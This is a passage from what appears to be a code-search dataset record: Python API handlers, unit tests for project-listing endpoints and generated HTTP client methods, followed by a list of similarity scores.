Expect there to be no project data.\n \"\"\"\n assert 0 == step_writer_serialize.call_count, \"\"\"\n Expect no step serialization to be carried out.\n \"\"\"\n assert [] == response['data']['step_changes'], \"\"\"\n Expect no step changes to exist without project data.\n \"\"\"\n assert response['hash'].startswith('forced-'), \"\"\"\n Expect a forced call to have a forced hash.\n \"\"\"", "def test_returns_projects_filter_by_statuses(self):\n # Arrange\n self.test_project_1.status = ProjectStatus.DRAFT.value\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set status of test_project_3 to archived.\n self.test_project_3.status = ProjectStatus.ARCHIVED.value\n self.test_project_3.save()\n\n # Act\n response_pub = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.PUBLISHED.name]},\n )\n # Assert\n self.assertEqual(response_pub.status_code, 200)\n self.assertEqual(len(response_pub.json[\"results\"]), 1)\n self.assertEqual(\n response_pub.json[\"results\"][0][\"projectId\"], self.test_project_2.id\n )\n\n # Act\n response_draft = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.DRAFT.name]},\n )\n # Assert\n self.assertEqual(response_draft.status_code, 200)\n self.assertEqual(len(response_draft.json[\"results\"]), 1)\n self.assertEqual(\n response_draft.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )\n\n # Act\n response_archived = self.client.get(\n self.url,\n 
headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.ARCHIVED.name]},\n )\n # Assert\n self.assertEqual(response_archived.status_code, 200)\n self.assertEqual(len(response_archived.json[\"results\"]), 1)\n self.assertEqual(\n response_archived.json[\"results\"][0][\"projectId\"], self.test_project_3.id\n )\n\n # Test multiple statuses returns all projects with those statuses.\n # Act\n response_all = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\n \"projectStatuses\": \"PUBLISHED,DRAFT,ARCHIVED\",\n },\n )\n # Assert\n self.assertEqual(response_all.status_code, 200)\n self.assertEqual(len(response_all.json[\"results\"]), 3)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_all.json[\"results\"]],\n [self.test_project_1.id, self.test_project_2.id, self.test_project_3.id],\n )", "def test_returns_all_projects_if_difficulty_set_to_all(self):\n # Arrange\n self.test_project_2.private = False\n # Set difficulty of test_project_2 to easy.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n self.test_project_2.save()\n self.test_project_1.difficulty = ProjectDifficulty.MODERATE.value\n self.test_project_1.save()\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.PUBLISHED.value\n test_project_4.difficulty = ProjectDifficulty.CHALLENGING.value\n test_project_4.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"ALL\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # User is only permitted for test_project 1, 2 and 4, since test_project_3 is DRAFT.\n self.assertEqual(len(response.json[\"results\"]), 3)\n self.assertNotIn(\n self.test_project_3.id, [i[\"projectId\"] for i in response.json[\"results\"]]\n )", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/summary/\")\n self.assertEqual(response.status_code, 404)", "def format_service_api_response(func):\n @wraps(func)\n def get_response(*args, **kwargs):\n try:\n res = func(*args, **kwargs)\n return {\"status\": \"200\", \"result\": res}\n except:\n return {\"status\": \"404\", \"result\": \"\"}\n return get_response", "def get(self):\n authenticated_user_id = token_auth.current_user()\n orgs_dto = OrganisationService.get_organisations_managed_by_user_as_dto(\n authenticated_user_id\n )\n if len(orgs_dto.organisations) < 1:\n return {\n \"Error\": \"User is not a manager of the project\",\n \"SubCode\": \"UserPermissionError\",\n }, 403\n\n try:\n search_dto = ProjectSearchBBoxDTO()\n search_dto.bbox = map(float, request.args.get(\"bbox\").split(\",\"))\n search_dto.input_srid = request.args.get(\"srid\")\n search_dto.preferred_locale = request.environ.get(\"HTTP_ACCEPT_LANGUAGE\")\n created_by_me = (\n strtobool(request.args.get(\"createdByMe\"))\n if request.args.get(\"createdByMe\")\n else False\n )\n if created_by_me:\n search_dto.project_author = authenticated_user_id\n search_dto.validate()\n except Exception as e:\n current_app.logger.error(f\"Error validating request: {str(e)}\")\n return {\n \"Error\": f\"Error validating request: {str(e)}\",\n \"SubCode\": \"InvalidData\",\n }, 400\n try:\n geojson = ProjectSearchService.get_projects_geojson(search_dto)\n return geojson, 200\n except BBoxTooBigError as e:\n return {\"Error\": str(e).split(\"-\")[1], 
\"SubCode\": str(e).split(\"-\")[0]}, 400\n except ProjectSearchServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400", "def API_company(request):\n query = request.GET\n if any(key for key in query if key not in API_COMPANY_VALIDKEYS):\n #print([(key,key not in API_COMPANY_VALIDKEYS) for key in query])\n return django.http.HttpResponseBadRequest(\"Invalid query\")\n if \"search\" in query:\n return API_companysearch(request)\n elif \"po\" in query:\n return API_companypo(request)\n return django.http.Http404()", "def returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/priority-areas/\")\n self.assertEqual(response.status_code, 404)", "def get(self, project_id):\n try:\n authenticated_user_id = token_auth.current_user()\n as_file = bool(\n strtobool(request.args.get(\"as_file\"))\n if request.args.get(\"as_file\")\n else False\n )\n abbreviated = bool(\n strtobool(request.args.get(\"abbreviated\"))\n if request.args.get(\"abbreviated\")\n else False\n )\n project_dto = ProjectService.get_project_dto_for_mapper(\n project_id,\n authenticated_user_id,\n request.environ.get(\"HTTP_ACCEPT_LANGUAGE\"),\n abbreviated,\n )\n\n if project_dto:\n project_dto = project_dto.to_primitive()\n if as_file:\n return send_file(\n io.BytesIO(geojson.dumps(project_dto).encode(\"utf-8\")),\n mimetype=\"application/json\",\n as_attachment=True,\n download_name=f\"project_{str(project_id)}.json\",\n )\n\n return project_dto, 200\n else:\n return {\n \"Error\": \"User not permitted: Private Project\",\n \"SubCode\": \"PrivateProject\",\n }, 403\n except ProjectServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 403\n finally:\n # this will try to unlock tasks that have been locked too long\n try:\n ProjectService.auto_unlock_tasks(project_id)\n except Exception as e:\n current_app.logger.critical(str(e))", "async def get_invalid(self, **kwargs: Any) -> bool:\n error_map = {\n 401: ClientAuthenticationError,\n 404: ResourceNotFoundError,\n 409: ResourceExistsError,\n 304: ResourceNotModifiedError,\n }\n error_map.update(kwargs.pop(\"error_map\", {}) or {})\n\n _headers = kwargs.pop(\"headers\", {}) or {}\n _params = kwargs.pop(\"params\", {}) or {}\n\n cls: ClsType[bool] = kwargs.pop(\"cls\", None)\n\n request = build_bool_get_invalid_request(\n headers=_headers,\n params=_params,\n )\n request.url = self._client.format_url(request.url)\n\n _stream = False\n pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access\n request, stream=_stream, **kwargs\n )\n\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n if _stream:\n await response.read() # Load the body in memory and close the socket\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response)\n\n if response.content:\n deserialized = response.json()\n else:\n deserialized = None\n\n if cls:\n return cls(pipeline_response, cast(bool, deserialized), {})\n\n return cast(bool, deserialized)", "def _GetResponseObject200(\n self,\n result_type: Union[rdf_structs.RDFProtoStruct, str],\n router_method_name: str,\n ) -> Dict[str, Union[str, Dict[str, Any]]]:\n resp_success_obj: Dict[str, Union[str, Dict[str, Any]]] = dict()\n\n if result_type:\n if (isinstance(result_type, type) and\n issubclass(result_type, rdf_structs.RDFProtoStruct)):\n 
result_type_name = _GetTypeName(\n cast(rdf_structs.RDFProtoStruct, result_type).protobuf.DESCRIPTOR)\n else:\n result_type_name = _GetTypeName(result_type)\n\n resp_success_obj[\"description\"] = (\n f\"The call to the {router_method_name} API method succeeded and it \"\n f\"returned an instance of {result_type_name}.\")\n\n media_obj = {\"schema\": _GetReferenceObject(result_type_name)}\n\n content = dict() # Needed to please mypy.\n if result_type == \"BinaryStream\":\n content[\"application/octet-stream\"] = media_obj\n else:\n content[\"application/json\"] = media_obj\n resp_success_obj[\"content\"] = content\n else:\n resp_success_obj[\"description\"] = (\n f\"The call to the {router_method_name} API method succeeded.\")\n\n return resp_success_obj", "def test_returns_easy_projects_if_difficulty_set_to_easy(self):\n # Arrange\n self.test_project_2.private = False\n # Set difficulty of test_project_2 to easy.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n self.test_project_2.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"EASY\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_2.id\n )", "async def get_valid(self, **kwargs: Any) -> JSON:\n error_map = {\n 401: ClientAuthenticationError,\n 404: ResourceNotFoundError,\n 409: ResourceExistsError,\n 304: ResourceNotModifiedError,\n }\n error_map.update(kwargs.pop(\"error_map\", {}) or {})\n\n _headers = kwargs.pop(\"headers\", {}) or {}\n _params = kwargs.pop(\"params\", {}) or {}\n\n cls: ClsType[JSON] = kwargs.pop(\"cls\", None)\n\n request = build_inheritance_get_valid_request(\n headers=_headers,\n params=_params,\n )\n request.url = self._client.format_url(request.url)\n\n _stream = False\n pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access\n request, stream=_stream, **kwargs\n )\n\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n if _stream:\n await response.read() # Load the body in memory and close the socket\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response)\n\n if response.content:\n deserialized = response.json()\n else:\n deserialized = None\n\n if cls:\n return cls(pipeline_response, cast(JSON, deserialized), {})\n\n return cast(JSON, deserialized)" ]
[ "0.64074504", "0.584251", "0.57444906", "0.5642053", "0.55687165", "0.55578846", "0.5441781", "0.54382634", "0.5401079", "0.5363507", "0.53115785", "0.53091395", "0.5285356", "0.52749294", "0.52570665", "0.52514297", "0.52415955", "0.5230785", "0.5206412", "0.52010256", "0.514516", "0.51304245", "0.51076394", "0.5105563", "0.5096675", "0.5089765", "0.50774765", "0.5075774", "0.5071232", "0.5068705" ]
0.80576724
0
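A minimal usage sketch for the api_response wrapper above. The project_types whitelist and the sample payloads are assumptions, not part of the original source; the invalid_project_tye_msg helper (misspelling preserved verbatim from the source) mirrors the definition that appears among the negatives:

project_types = ["standalone", "integration", "library"]  # assumed whitelist

def invalid_project_tye_msg(proj_type):
    # Helper as shown in the negatives above: returns a Flask-style (body, status) pair.
    return {"error": f"Project type {proj_type} is not valid, please use one of the following: "
                     f"{', '.join(project_types)}"}, 400

def api_response(project_type, result):
    if project_type not in project_types:
        return invalid_project_tye_msg(project_type)
    return result

print(api_response("library", {"items": []}))   # valid type: result passed through unchanged
print(api_response("unknown", {"items": []}))   # invalid type: (error body, 400)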
Function to check for XPath validity. Tries to create an etree ETXPath instance from the query. If this fails, the XPathSyntaxError is caught and False is returned. Returns True otherwise.
def is_valid_query(query):
    try:
        etree.ETXPath(query)
        return True
    except etree.XPathSyntaxError:
        return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def do_xpath(xpath, etree):\n try:\n return etree.xpath(xpath)\n except (lxml.etree.XPathSyntaxError, lxml.etree.XPathEvalError):\n raise InvalidXPathExpression(sys.exc_info()[:2], value=xpath)", "def compile_xpath(xpath, key=None):\n try:\n return lxml.etree.XPath(xpath)\n except lxml.etree.XPathSyntaxError:\n raise InvalidXPathExpression(sys.exc_info()[:2], value=xpath, key=key)", "def check_exists_by_xpath(self, xpath):\n try:\n self.driver.find_element_by_xpath(xpath)\n except NoSuchElementException:\n return False\n return True", "def test_locationFooBar(self):\n xp = XPathQuery(\"/foo/bar\")\n self.assertEqual(xp.matches(self.e), 1)", "def test_anyLocationQueryForString(self):\n xp = XPathQuery(\"//bar\")\n self.assertRaises(NotImplementedError, xp.queryForString, None)", "def _does_webelement_with_xpath_exist(self, xpath, timeout=60):\n return self._search_element(By.XPATH, xpath, timeout=timeout)", "def test_locationNoBar3(self):\n xp = XPathQuery(\"/foo/bar3\")\n self.assertEqual(xp.matches(self.e), 0)", "def test_predicate6(self):\n xpb = XPathBuilder()\n xp = xpb.foobar.where(2)\n exp = '/foobar[2]'\n self.assertEqual(xp.tostring(), exp)", "def test_predicate5(self):\n xpb = XPathBuilder()\n xp = xpb.foobar[2]\n exp = '/foobar[2]'\n self.assertEqual(xp.tostring(), exp)", "def test_badXPathNoClosingBracket(self):\n exc = self.assertRaises(SyntaxError, XPathQuery, \"\"\"//bar[@attrib1\"\"\")\n self.assertTrue(exc.msg.startswith(\"Trying to find one of\"),\n (\"SyntaxError message '%s' doesn't start with \"\n \"'Trying to find one of'\") % exc.msg)", "def validate_etree(self, etree_xml):\n valid = self.xml_schema.validate(etree_xml)\n return SchemaValidationResult(valid, self.xml_schema.error_log)", "def xpathTrueFunction(self, nargs):\n libxml2mod.xmlXPathTrueFunction(self._o, nargs)", "def validate(self) :\n\t\tif self.doc is not None :\n\t\t\tparser = etree.XMLParser(recover=True, strip_cdata=True)\n\t\t\ttree = etree.XML(self.doc.toxml(), parser)\n\t\t\tdtdFile = self._getDTDFile()\n\t\t\tif dtdFile is not None :\n\t\t\t\tif _existFile(dtdFile) :\n\t\t\t\t\tdtd = etree.DTD(dtdFile)\n\t\t\t\t\tif dtd.validate(tree) :\n\t\t\t\t\t\tself._enrichXML()\n\t\t\t\t\t\treturn True\n\t\t\t\t\telse :\n\t\t\t\t\t\tprint(dtd.error_log.filter_from_errors()[0])\n\t\t\t\t\t\treturn False\n\t\t\t\telse :\n\t\t\t\t\tprint('Unable to find the DTD file ',dtdFile)\n\t\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tself._enrichXML()\n\t\t\t\treturn True\n\t\telse :\n\t\t\treturn False", "def SyntaxChecker_isValidXMLanyURI(*args):\n return _libsbml.SyntaxChecker_isValidXMLanyURI(*args)", "def apply_xpath(xpath, etree, key=None):\n try:\n return xpath(etree)\n except lxml.etree.XPathEvalError:\n raise InvalidXPathExpression(sys.exc_info()[:2], value=xpath, key=key)", "def is_element_present_by_xpath(self, x_path, timeout=10):\n try:\n wait = WebDriverWait(self.web_driver, timeout)\n wait.until(lambda driver: self.web_driver.find_element(By.XPATH, x_path))\n return True\n except TimeoutException:\n return False", "def test_pathop1(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar & xpb.bar.foo\n exp = '/foo/bar and /bar/foo'\n self.assertEqual(xp.tostring(), exp)", "def isValidXMLanyURI(*args):\n return _libsbml.SyntaxChecker_isValidXMLanyURI(*args)", "def test_predicate7(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar[(xpb.attr('name') == 'foo') & (xpb.attr('x') == 'x')]\n exp = '/foo/bar[@name = \"foo\" and @x = \"x\"]'\n self.assertEqual(xp.tostring(), exp)", "def hasExpectedXHTMLSyntax(*args):\n 
return _libsbml.SyntaxChecker_hasExpectedXHTMLSyntax(*args)", "def xpathErr(self, error):\n libxml2mod.xmlXPathErr(self._o, error)", "def assert_has_xpath(self, xml_root, xpath, context_dict, exact_num=1):\r\n message = (\"XML does not have %d match(es) for xpath '%s'\\nXML: %s\\nContext: %s\"\r\n % (exact_num, str(xpath), etree.tostring(xml_root), str(context_dict)))\r\n\r\n self.assertEqual(len(xml_root.xpath(xpath)), exact_num, msg=message)", "def xpath_returns_text(xpath_expr, xpath_as_str_re=XPATH_AS_STR_RE):\n return bool(xpath_as_str_re.search(xpath_expr))", "def xpathEvalExpr(self):\n libxml2mod.xmlXPathEvalExpr(self._o)", "def test_pathop12(self):\n xpb = XPathBuilder()\n # braces not needed\n xp = xpb.foo & (xpb.bar.foo).parenthesize() | xpb.foobar\n exp = '/foo and (/bar/foo) or /foobar'\n self.assertEqual(xp.tostring(), exp)", "def test_path9(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar == xpb.foobar\n exp = '/foo/bar = /foobar'\n self.assertEqual(xp.tostring(), exp)", "def test_exception1(self):\n xpb = XPathBuilder()\n pred = xpb.attr('foo') == 'bar'\n path = xpb.foo.bar\n pred_expr = path[pred]\n self.assertEqual(pred_expr.tostring(), '/foo/bar[@foo = \"bar\"]')\n pred.reparent(None)\n self.assertRaises(XPathSyntaxError, pred_expr.tostring)", "def test_pathop6(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar.log_not()\n exp = 'not(/foo/bar)'\n self.assertEqual(xp.tostring(), exp)", "def test_queryForString(self):\n xp = XPathQuery(\"/foo\")\n self.assertEqual(xp.queryForString(self.e), \"somecontent\")", "def is_xpath_locator(locator_string: str) -> bool:\n if locator_string.startswith(\"/\"):\n return True\n return False" ]
[ "0.6174968", "0.5611842", "0.54611474", "0.5443031", "0.54190075", "0.54012316", "0.5400232", "0.5372852", "0.5365433", "0.53124905", "0.5279214", "0.5277152", "0.52084434", "0.5196005", "0.5166062", "0.5154404", "0.51458836", "0.51294345", "0.5126877", "0.5125673", "0.50833386", "0.5069324", "0.50518167", "0.5051435", "0.5043804", "0.50251776", "0.50157225", "0.50105214", "0.5008219", "0.5001242" ]
0.74816614
0
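A short, self-contained sketch of is_valid_query in use; the sample XPath expressions are illustrative only:

from lxml import etree

def is_valid_query(query):
    try:
        etree.ETXPath(query)  # compiling the expression is the validity check
        return True
    except etree.XPathSyntaxError:
        return False

print(is_valid_query("//record/field[@name='id']"))  # True: well-formed XPath
print(is_valid_query("//record/field[@name='id'"))   # False: unbalanced bracket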
First checks whether the request body is a simple dictionary with string keys and string values. If so, the queries in the request message are saved to disk.
def process_queries(req, save_dir, replace_allowed):
    create_dir_if_not_exists(save_dir)
    req_obj = json.loads(req.data)
    result_dict = dict()
    if not all(map(lambda x: all(map(lambda y: isinstance(y, str), x)), req_obj.items())):
        return {"message": "Not all query names or values are strings"}, 400
    for query_name, query_value in req_obj.items():
        exists = os.path.exists(os.path.join(save_dir, query_name))
        if not is_valid_query(query_value):
            result_dict[query_name] = "invalid XPath expression"
        elif not replace_allowed and exists:
            result_dict[query_name] = "not created: already exists"
        elif replace_allowed and not exists:
            result_dict[query_name] = "not replaced: does not exist"
        else:
            with open(os.path.join(save_dir, query_name), 'w') as f:
                f.write(query_value)
            result_dict[query_name] = "replaced" if replace_allowed else "created"
    if len(os.listdir(save_dir)) == 0:
        os.rmdir(save_dir)
    return result_dict, 200
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def save_request(self, request):\n request_dict = self.process_request(request)\n self.ser.info(pickle.dumps(request_dict))\n self.ser.info(REQUEST_UNIQUE_STRING)", "def test_query_dict_for_request_in_method_post(self):\n self.request.POST = QueryDict(\"foo=bar\")\n response = self.panel.process_request(self.request)\n self.panel.generate_stats(self.request, response)\n # ensure the panel POST request data is processed correctly.\n content = self.panel.content\n self.assertIn(\"foo\", content)\n self.assertIn(\"bar\", content)", "def request(query):", "def _prepare_payload(self):\n\n requests_json = []\n for qry in self._current_query.queries:\n request = qry.build_request()\n requests_json.append(self._serialize_request(request, len(requests_json)))\n\n return {\"requests\": requests_json}", "def test_input_dict(self):\n self.app.app.preprocess_request()\n\n input_dict = {'foo': 'bar'}\n\n resp = self.r(input_dict)\n\n self.assertIsInstance(\n resp, werkzeug.wrappers.Response\n )\n\n self.assertIn(\n 'foo:bar',\n resp.data.decode()\n )", "def _handle_request(data):\n global puts_so_far\n global gets_so_far\n global query_times\n # Format of requesttuple: ('PUT'/'GET', key, value, TTLval\n requesttuple = serialize.serialize_deserializedata(data)\n\n if requesttuple[0] == 'PUT':\n puts_so_far += 1\n\n ############# START Tons of type checking\n try:\n (key, value, ttlval) = requesttuple[1:]\n except ValueError, e:\n _log_with_timestamp(' > ERROR: Incorrect format for request tuple: ' + str(requesttuple) + \"\\n\")\n return\n\n if type(key) is not str:\n _log_with_timestamp(' > ERROR: Key type for PUT must be str, not' + str(type(key)) + \"\\n\")\n return\n\n if type(value) is not str:\n _log_with_timestamp(' > ERROR: Value type must be str, not' + str(type(value)) + \"\\n\")\n return\n\n if type(ttlval) is not int and type(ttlval) is not long:\n _log_with_timestamp(' > ERROR: TTL type must be int or long, not' + str(type(ttlval)) + \"\\n\")\n return\n\n if ttlval <=0:\n _log_with_timestamp(' > ERROR: TTL must be positive, not ' + str(ttlval) + \"\\n\")\n return\n ############# END Tons of type checking\n\n _insert_item(key, value, ttlval)\n _insert_item('%all', value, ttlval)\n\n return serialize.serialize_serializedata(\"OK\")\n\n elif requesttuple[0] == 'GET':\n gets_so_far += 1\n\n ############# START Tons of type checking (similar to above\n try:\n (key, maxvals) = requesttuple[1:]\n except ValueError, e:\n log(' > ERROR: Incorrect format for request tuple: ' + str(requesttuple) + \"\\n\")\n return\n\n if type(key) is not str:\n log(' > ERROR: Key type for GET must be str, not' + str(type(key)) + \"\\n\")\n return\n\n if type(maxvals) is not int and type(maxvals) is not long:\n log(' > ERROR: Maximum value type must be int or long, not' + str(type(maxvals)) + \"\\n\")\n return\n\n if maxvals <=0:\n log(' > ERROR: maxvals; Value type must be positive, not ' + str(maxvals) + \"\\n\")\n return\n\n ############# END Tons of type checking\n\n readlist = []\n entries = _read_item(key, maxvals)\n\n for entry in entries:\n readlist.append(entry)\n\n return serialize.serialize_serializedata((\"OK\", readlist))\n\n return", "def serialize_request(self, request):\n raise NotImplementedError()", "def validatePayload(q, request):\r\n\t\tassert type(q) is str\r\n\t\t# Queries with subtitutions must have the format {var.type} for input validation purposes.\r\n\t\tformatType = Validator.getFormatType(request)\r\n\t\tif formatType == 'str':\r\n\t\t\titems = request.args.items()\r\n\t\t\tpayload = 
{}\r\n\t\t\t[payload.update({item[0]: item[1]}) for item in items]\r\n\t\telif formatType == 'json':\r\n\t\t\tpayload = request.get_json()\r\n\t\t\tpayload = json.loads(payload) if payload else None\r\n\t\telif formatType == 'urlencoded':\r\n\t\t\tpayload = {item:request.form[item] for item in request.form}\r\n\t\t\tif payload is None:\r\n\t\t\t\titems = request.args.items()\r\n\t\t\t\tpayload = {}\r\n\t\t\t\t[payload.update({item[0]: item[1]}) for item in items]\r\n\t\tnewQuery, expectedParamsAndTypes = Validator.extractQueryParams(q)\r\n\t\tpayload = Validator.validateJsonRequestParams(payload, expectedParamsAndTypes, formatType)\r\n\t\treturn (payload, newQuery)", "def test_dict_for_request_in_method_post(self):\n self.request.POST = {\"foo\": \"bar\"}\n response = self.panel.process_request(self.request)\n self.panel.generate_stats(self.request, response)\n # ensure the panel POST request data is processed correctly.\n content = self.panel.content\n self.assertIn(\"foo\", content)\n self.assertIn(\"bar\", content)", "def buildCheckRequestToDict(self, uID, request, firstname, lastname):\n result = {}\n result['uID'] = uID\n result['request'] = request\n result['firstname'] = firstname\n result['lastname'] = lastname\n return result", "def save_data():\n\tdata = dict(request.args)\n\n\treturn jsonify(result={\"status\": 200})", "def handle_request_payload(self, input_args):\n\n if self.resource['operation'] == PyMongoEvent.INSERT_MANY:\n add_data_if_needed(self.resource['metadata'], 'Items',\n input_args[0])\n\n elif self.resource['operation'] == PyMongoEvent.INSERT_ONE:\n add_data_if_needed(self.resource['metadata'], 'Item',\n input_args[0])\n\n elif self.resource['operation'] in PyMongoEvent.FILTER_OPERATIONS:\n add_data_if_needed(self.resource['metadata'], 'Filter',\n input_args[0])\n\n if self.resource['operation'] == 'update_one':\n add_data_if_needed(self.resource['metadata'], 'New Values',\n input_args[1])", "def test_query_dict_for_request_in_method_get(self):\n self.request.GET = QueryDict(\"foo=bar\")\n response = self.panel.process_request(self.request)\n self.panel.generate_stats(self.request, response)\n # ensure the panel GET request data is processed correctly.\n content = self.panel.content\n self.assertIn(\"foo\", content)\n self.assertIn(\"bar\", content)", "def execute(self, req):\n\t\tmyPath = req[\"url\"].replace(self.settings[\"ns\"][\"local\"], \"\", 1).split(\"/\")\n\t\tfile = myPath.pop(0)\n\t\tcurrentDir = getcwd()\n\t\tservice = self.basedir + file\n\t\turi = req[\"url\"]\n\t\tqueryPath = \"%s/queries/\" % service\n\t\ttemplatePath = \"%s/\" % service\n\t\ttemplateName = self.mime.getExtension(req[\"request\"].accept_mimetypes.best)\n\t\ttry:\n\t\t\tonlyfiles = [f for f in listdir(queryPath) if isfile(join(queryPath, f))]\n\t\texcept OSError:\n\t\t\tprint \"Warning: Can't find path %s for queries.\" % templatePath\n\t\t\tonlyfiles = []\n\t\tqueries = {}\n\t\tfirst={}\n\t\tfor root, dirs, files in walk(queryPath):\n\t\t\tfor filename in files:\n\t\t\t\ttry:\n\t\t\t\t\tcurrentEndpoint = \"local\"\n\t\t\t\t\t_aux = root.rstrip(\"/\").split(\"/\").pop()\n\t\t\t\t\tif _aux != \"queries\":\n\t\t\t\t\t\tcurrentEndpoint = _aux\n\t\t\t\t\tif not filename.endswith(\".query\"):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tsqlQuery = self.env.get_template(\"%s/%s\" % (root, filename))\n\t\t\t\t\trenderedSqlQuery = sqlQuery.render(queries=queries, first=first, uri=uri, session=session, flod=self.flod, args=myPath)\n\t\t\t\t\tif re.match(\"^\\s*select\", renderedSqlQuery, 
flags=re.IGNORECASE) is None:\n\t\t\t\t\t\treturn {\"content\": \"Not a valid SQL Select query\", \"status\": 500}\n\t\t\t\t\tresults = self.sqlserver.query(renderedSqlQuery, currentEndpoint)\n\t\t\t\t\t_name = filename.replace(\".query\", \"\")\n\t\t\t\t\tqueries[_name] = []\n\t\t\t\t\tif results is not None:\n\t\t\t\t\t\tqueries[_name] = results\n\n\t\t\t\texcept Exception, ex:\n\t\t\t\t\tprint sys.exc_info()\n\t\t\t\t\tprint ex\n\t\t\t\t\treturn {\"content\": \"A problem with the SQL endpoint occurred\", \"status\": 500}\n\t\tchdir(currentDir)\n\t\ttry:\n\t\t\tif templateName == \"json\" and not isfile( \"%s%s.template\" % (templatePath, templateName)):\n\t\t\t\tout = json.dumps(queries)\n\t\t\telse:\n\t\t\t\tcontent = self.env.get_template(\"%s%s.template\" % (templatePath, templateName))\n\t\t\t\tout = content.render(queries=queries, uri=uri, session=session, flod=self.flod, args=myPath)\n\t\texcept Exception:\n\t\t\tprint sys.exc_info()\n\t\t\treturn {\"content\": \"Rendering problems\" , \"status\": 500}\n\t\treturn {\"content\": out, \"mimetype\": \"text/html\"}", "def handleQuery(self, query) -> None: # noqa\n results = []\n\n try:\n query_str = query.string.strip()\n\n # too small request - don't even send it.\n if len(query_str) < 2:\n keys_monitor.reset()\n return\n\n if len(query_str.split()) > 1:\n # pydictionary or synonyms.com don't seem to support this\n query.add(\n v0.Item(\n id=md_name,\n icon=[icon_path],\n text=\"A term must be only a single word\",\n actions=[],\n )\n )\n return\n\n # determine if we can make the request --------------------------------------------\n keys_monitor.report()\n if keys_monitor.triggered():\n results.extend(get_items_for_word(query, query_str))\n\n if not results:\n query.add(\n 0,\n v0.Item(\n id=md_name,\n icon=[icon_path],\n text=\"No results.\",\n actions=[],\n ),\n )\n\n return\n else:\n query.add(results)\n\n except Exception: # user to report error\n print(traceback.format_exc())\n query.add(\n v0.Item(\n id=md_name,\n icon=[icon_path],\n text=\"Something went wrong! 
Press [ENTER] to copy error and report it\",\n actions=[\n ClipAction(\n f\"Copy error - report it to {md_url[8:]}\",\n f\"{traceback.format_exc()}\",\n )\n ],\n ),\n )", "def get_request(req: Dict) -> Dict:\n for field in ['body']:\n if field in req:\n data = req[field]\n if isinstance(data, str):\n return create_request(data)\n elif isinstance(data, dict) and 'text' in data:\n return data\n return None", "def _parse_in_request(self, request):\n error = None\n self.logger.debug(\"Http method: %s\" % request.method)\n if request.method == 'GET':\n self._params = request.args.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)\n \n elif request.method == 'POST':\n self._params = request.form.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)", "def query_request():\n query_data = request.get_json()\n print(query_data)\n example_response = []\n \n # First we need to check if the request is for table or time series data\n if query_data and query_data == 'table':\n # send back columns and rows\n pass\n elif query_data:\n # send back value/clock pairs for timeseries charts\n example_response = generate_fake_timeseries(query_data.get('range', {}).get('from'),\n query_data.get('range', {}).get('to'),\n interval=query_data.get('intervalMs', 60000),\n create=4)\n return make_response(jsonify(example_response))", "def test_valid_analysis_request(analysis_request_dict: JSONDict) -> None:\n\n request = AnalysisRequest(**analysis_request_dict)\n\n assert request.dict() == analysis_request_dict", "def export_updateRequest(self,requestName,requestString):\n gLogger.info(\"RequestManagerHandler.updateRequest: Attempting to update %s.\" % requestName)\n try:\n res = requestDB.updateRequest(requestName,requestString)\n return res\n except Exception,x:\n errStr = \"RequestManagerHandler.updateRequest: Exception which updating request.\"\n gLogger.exception(errStr,requestName,lException=x)\n return S_ERROR(errStr)", "def handle(req):\n msg = json.loads(req)\n msg['data'] = {key: value for key, value in msg['data'].items()\n if key not in keys}\n return json.dumps(msg)", "def query(\n self,\n woql_query: Union[dict, WOQLQuery],\n commit_msg: Optional[str] = None,\n file_dict: Optional[dict] = None,\n ) -> Union[dict, str]:\n self._check_connection()\n query_obj = self._generate_commit(commit_msg)\n if isinstance(woql_query, WOQLQuery):\n request_woql_query = woql_query.to_dict()\n else:\n request_woql_query = woql_query\n request_woql_query[\"@context\"] = self._context\n query_obj[\"query\"] = request_woql_query\n # request_file_dict: Optional[Dict[str, Tuple[str, Union[str, BinaryIO], str]]]\n if file_dict is not None and 